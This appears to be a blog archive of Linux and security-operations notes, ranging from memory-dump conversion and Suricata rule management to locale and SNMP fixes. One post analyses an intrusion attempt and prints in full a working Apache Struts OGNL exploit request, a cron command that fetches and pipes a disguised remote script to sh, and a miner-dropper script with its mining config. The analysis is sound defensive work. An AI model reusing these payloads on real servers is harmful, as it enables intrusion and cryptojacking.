Tag Archives: linux

Generate Memory Dump from .vmss file using vmss2core

Previously, I’ve encountered a problem where I’m unable to copy the .vmem file for further analysis.

So, the next alternative way that we can do is to use .vmss file & convert it into .vmem file. .vmss is a Virtual machine suspend file.

To start convert it, first you need to download vmss2core tool here – https://flings.vmware.com/vmss2core

Next, open your cmd and enter cmd as below:

F:\Tools> .\vmss2core-sb-8456865.exe -W 'F:\INC\<REDACTED>\<REDACTED>.vmss'
vmss2core version 8456865 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
region[0]: start=0 end=c0000000.
region[1]: start=100000000 end=240000000.
Cannot translate linear address 0.
... 10 MBs written.
... 20 MBs written.
<snip>
... 8180 MBs written.
... 8190 MBs written.
Finished writing core.

After it finished, it will create a file named memory.vmem.

There you have it. So you can start doing your memory analysis using volatility if you want.

For example, here weโ€™ll be using volatility in order to find out the profile for which .vmem is created.

$ python vol.py -f memory.dmp imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : VirtualBoxCoreDumpElf64 (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/home/memory.dmp)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800028530a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002854d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2019-12-23 17:42:50 UTC+0000
     Image local date and time : 2019-12-23 11:42:50 -0600

Check bulk IP for reverse DNS (rDNS)

Recently I’ve encounter list of IPs that are related to CoinHive. So I want to check for domains that tied to these IPs. We can do that by using dig command to perform reverse DNS (rDNS).

Reverse DNS (rDNS) is a method of resolving an IP address into domain name, just as the domain name system (DNS) resolves domain names into associated IP addresses.

I found this script at this site:

#!/bin/bash

for item
    do
        domain=$(dig -x "$item"  +short)
        if [ -n "$domain"  ] ;
            then
            echo "$item" - "$domain"
        else
            echo "$item" result is NULL
        fi
    done

Just save this code above in your Linux/*nix machine, and run this command as below:

[email protected]:~# cat ip.txt | xargs bash reverse_dns

The result should be like this:

Suricata rule management using Oinkmaster

It is possible to download and install rules manually, but there is a much easier and quicker way to do so. There are special programs which you can use for downloading and installing rules. For example, Pulled Pork and Oinkmaster. Here I’m going to show how to install & use Oinkmaster.

To install Oinkmaster, enter:

sudo apt-get install oinkmaster

There are several rulesets available. There are Emerging Threats (ET), ET Pro and VRT. In this example we are using ET Free edition.

Oinkmaster need to know where these rules can be found. These rules can be found at:
http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz

To configure your Oinkmaster rules location, open oinkmaster.conf and add the link/url as below:

sudo nano /etc/oinkmaster.conf

Then add this line below:
url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz

In the new rules directory, a file named classification.config and reference.config can be found. The directories of both need to be added into suricata.yaml file. Do so by entering as below:

sudo nano /etc/suricata/suricata.yaml

Add this line below:

classification-file: /etc/suricata/rules/classification.config
reference-config-file: /etc/suricata/rules/reference.config

Let’s try run the Oinkmaster:

sudo oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules

The rules in locate at /etc/suricata/rules.

  • https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Rule_Management_with_Oinkmaster
  • https://web.nsrc.org/workshops/2015/pacnog17-ws/raw-attachment/wiki/Track2Agenda/ex-suricata-rules.htm

Shell hiding in image files

One day, we noticed strange GET request towards our JBoss server:

GET /login.action   HTTP/1.1
Host: X.X.X.X
Connection: keep-alive 
Accept-Encoding: gzip, deflate 
Accept: */* 
User-Agent: Mozilla/5.0 
Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@org.apache.commons.io[email protected](#process.getInputStream(),#ros)).(#ros.flush())} 

From the request above, you’ll quickly noticed that this attack leveraging Apache Struts vulnerability from CVE-2017-5638.

The request tried to execute command below:

#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -'

Some explanations:
“-O” : writes the documents to file.
“-” : if is used as file, documents will be printed to standard output, disabling link conversion.
“-q” : quiet (no output)

As you see, it tried to fetch a .jpg file from 91.230.47.41. Seems normal right?
Let’s fetch that file & take a look inside it:

[email protected]:~/a# file logo.jpg
logo.jpg: POSIX shell script, ASCII text executable

ASCII?? Not JPG?? hmm..
Lets see what’s inside the “logo.jpg” file:

[email protected]:~/a# cat logo.jpg
#!/bin/sh
rm -rf /tmp/systemd-logind
rm -rf /tmp/logind.conf
rm -rf /tmp/kworker
rm -rf /tmp/kworker.conf
rm -rf /tmp/kauditd.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f qivtpwwuxs
ps auxf|grep -v grep|grep -v smzgmilpdo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qivtpwwuxs"|awk '{print $2}'|xargs kill -9
ps -fe|grep smzgmilpdo|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/smzgmilpdo.conf
rm -rf /tmp/smzgmilpdo.conf
curl -o /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
wget -O /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c smzgmilpdo.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

We noticed there are several other file fetched; possibly a config file & bin file.
Let’s fetch those file!

Here is the config file:
http://91.230.47.41/pics/kworker.conf

{{
    "url" : "stratum+tcp://212.129.44.157:80",
    "url" : "stratum+tcp://212.129.46.87:80",
    "url" : "stratum+tcp://212.129.44.156:80",
    "url" : "stratum+tcp://212.129.46.191:80",
    "url" : "stratum+tcp://62.210.29.108:80",
    "url" : "stratum+tcp://212.83.129.195:80",
    "url" : "stratum+tcp://212.129.44.155:80",
    "user" : "466iRjZzJZZWAqzV24ywY8XMVNkp9hj8UJiBEf61Eui6Nw8bEAJ1z434LWM3SKdaDyH7zgNY64rgg2fYmw8cbP5uBjpMA8g",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}

Not sure it is. Maybe some sort of config file for cryptomining. Lets analyze the other 2 files.

First file: http://91.230.47.41/pics/kworker

[email protected]:~/91.230.47.41# file kworker
kworker: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

hmm.. an executable Linux file..
Lets see if the file is packed:

[email protected]:~/91.230.47.41# upx -l kworker
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2979640 ->   1217152   40.85%  linux/ElfAMD   kworker

Yup. so lets unpacked the file using UPX:

[email protected]:~/91.230.47.41# upx -d kworker
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2980813 <-   1217152   40.83%  linux/ElfAMD   kworker

Unpacked 1 file.

[email protected]:~/91.230.47.41# upx -l kworker
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: kworker1: NotPackedException: not packed by UPX

Another file: http://91.230.47.41/pics/kworker_na

[email protected]:~/91.230.47.41# file kworker_na
kworker_na: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=0x0eedc33c49aeb80818a839a9b23cf159c710e443, stripped

[email protected]:~/91.230.47.41# upx -l kworker_na
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: kworker_na: NotPackedException: not packed by UPX

Overall, looks like the attacker want to hack our servers & turn it into his own crypto currency mining machine.
Typical behavior of attack we see in this time where the crypto currency is rising. People hack to make profit. ๐Ÿ™‚

Here the MD5 for file above:

211e98ac0686fe98d06570ad0689e9b3  logo.jpg
d2a01b844521fb141b8449f4d8e1c821  kworker.conf
483b322b42835227d98f523f9df5c6fc  kworker (upx packed)
4fa4269b7ce44bfce5ef574e6a37c38f  kworker (upx unpacked)
131df88b7d0b3e7a1c4d84c37e71fb60  kworker_na

Configuring proxy for APT in Ubuntu

Recently, I have a problem where when I tried to update Ubuntu package via apt-get, it shows HTTP 401 proxy error related.
Just a note, I’m running VM using my office network which has an enterprise web proxy servers.

From this site;

APT configuration file method

This method uses the apt.conf file which is found in your /etc/apt/ directory. This method is useful if you only want apt-get (and not other applications) to use a http-proxy permanently.

On some installations there will be no apt-conf file set up. This procedure will either edit an existing apt-conf file or create a new apt-conf file.

gksudo gedit /etc/apt/apt.conf

Add this line to your /etc/apt/apt.conf file (substitute your details for yourproxyaddress and proxyport).

Acquire::http::Proxy “http://username:[email protected]:proxyport”;

Save the apt.conf file.

References:

  • http://askubuntu.com/questions/257290/configure-proxy-for-apt
  • http://askubuntu.com/questions/543616/why-does-add-apt-repository-now-fail-to-retrieve-keys-behind-my-proxy-server-bu

Upgrade Python packages at using pip

As you read in the title above; to update your Python packages via pip.

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run as sudo. Probably.

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit:

http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Shell script fails: Syntax error: โ€œ(โ€ unexpected

There’s one time I encountered this error when executing a bash code/script:

install.sh: Syntax error: "(" unexpected

The script does not begin with a shebang line, so the kernel executes it with /bin/sh. On Ubuntu, /bin/sh is dash, a shell designed for fast startup and execution with only standard features. When dash reaches the line, it sees a syntax error: that parenthesis doesn’t mean anything to it in context.

Since dash (like all other shells) is an interpreter, it won’t complain until the execution reaches the problematic line. So even if the script successfully started at some point in your testing, it would have aborted once the problematic line was reached.

The shebang line must be the very first thing in the file. Since you use bash features, the first line of the file must be #!/bin/bash or #!/usr/bin/env bash.

Credit:
http://unix.stackexchange.com/questions/45781/shell-script-fails-syntax-error-unexpected

Fix Locale problem on Ubuntu

Recently, I saw this kind or error quite frequent. At first I thought that it was nothing.
But eventually, it’s kinda bothering me when I see the error message :p

Jul  6 15:18:01 lel CRON[25571]: pam_env(cron:session): Unable to open env file: /etc/default/locale: No such file or directory
Jul 6 15:31:50 lel sshd[29217]: pam_env(sshd:session): Unable to open env file: /etc/default/locale: No such file or directory

So, here is the solution to solve this problem.
First, run this command:

sudo update-locale LC_ALL=en_US.UTF-8 LANG=en_US.UTF-8

It updates /etc/default/locale with provided values.

If you see the /etc/default/locale file, it shows something like this:

#  File generated by update-locale
LANG=en_US.UTF-8
LC_ALL=en_US.UTF-8

If the problem still occur, maybe you can try this first before running the command above again:

sudo locale-gen en_US.UTF-8
sudo dpkg-reconfigure locales

Credit:
http://askubuntu.com/questions/162391/how-do-i-fix-my-locale-issue/505424#505424

SNMP Cannot Find Module on Ubuntu 14.04

If you encounter error something like this:

Cannot find module (SNMPv2-MIB): At line 0 in (none)
Cannot find module (SNMPv2-SMI): At line 0 in (none)
Cannot find module (SNMP-NOTIFICATION-MIB): At line 0 in (none)
Cannot find module (SNMPv2-TM): At line 0 in (none)

Then, where are in the same path. Path where we searching for the answers. XD
So, here is the solution to solve this error.

First, edit this sources.list file:

sudo vi /etc/apt/sources.list

add this line to the end of file:

deb http://fr.archive.ubuntu.com/ubuntu precise main multiverse

:w to save and :q to exit vi editor

Then, install this packages:

sudo apt-get install snmpd snmp-mibs-downloader

And then run this:

sudo download-mibs

Voila! Done. Hope it helps. ๐Ÿ™‚